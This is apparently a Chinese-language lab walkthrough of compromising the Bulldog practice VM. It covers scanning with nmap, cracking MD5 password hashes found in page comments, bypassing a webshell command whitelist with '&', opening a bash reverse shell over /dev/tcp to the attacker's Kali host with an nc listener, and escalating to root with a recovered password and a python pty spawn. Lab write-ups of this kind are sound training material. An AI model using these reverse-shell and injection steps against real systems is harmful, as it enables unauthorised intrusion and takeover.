前提條件
kali和bulldog靶機的的ip地址在同一個網段
本測試環境:
kali:192.168.56.102
bulldog:192.168.56.101
主機探測
利用kali的netdiscover工具掃描靶機ip地址
kali和bulldog靶機的的ip地址在同一個網段
本測試環境:
kali:192.168.56.102
bulldog:192.168.56.101
掃描靶機埠
利用kali的nmap工具掃描靶機ip地址
nmap -p- 192.168.56.101
掃描目標靶機埠的詳細服務資訊
nmap -p23,80,8080 -A -T4 192.168.56.101
web服務是python2
用瀏覽器訪問192.168.56.101並未發現異常;接下來掃描網站
發現了 /dev /admin robots.txt
/admin 是一個登入頁面,SQL隱碼攻擊並未成功
/robots.txt 並未發現異常
訪問/dev,發現了webshell連線,但是顯示需要驗證身份,可能需要先登入才能有許可權使用此webshell
在註釋中發現了異常
MD5值加密,使用線上解密網站解密試試。
成功解密兩個賬號密碼:
- nick---bulldog
- sarah---bulldoglover
使用其中一個使用者登入成功,然後使用/dev/中的webshell
白名單限制了使用的命令,通過&繞過
- 現在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash反彈shell到kali上 - kali上用nc偵聽6666埠
nc -nvlp 6666
kali機成功獲得反彈的shell
提權
使用普通使用者的許可權並沒有發現要獲得的資訊,於是要提升root許可權
在/home目錄下發現bulldogadmin資料夾,看檔名覺得裡面應該有東西
發現了隱藏資料夾,進去看看裡面的東西
使用cat命令沒有發現異常,使用strings發現下面了資訊,去掉應該H是root密碼---> SUPERultimatePASSWORDyouCANTget
在獲得的shell介面直接切換root使用者報錯
於是使用python指令碼
python -c 'import pty; pty.spawn("/bin/bash")'
輸入剛才獲取的密碼即可
成功獲取flag
後續技能學習:
- 反彈shell指令碼,不僅僅限於bash方法
python -c 'import pty; pty.spawn("/bin/bash")'此類常用的shell程式碼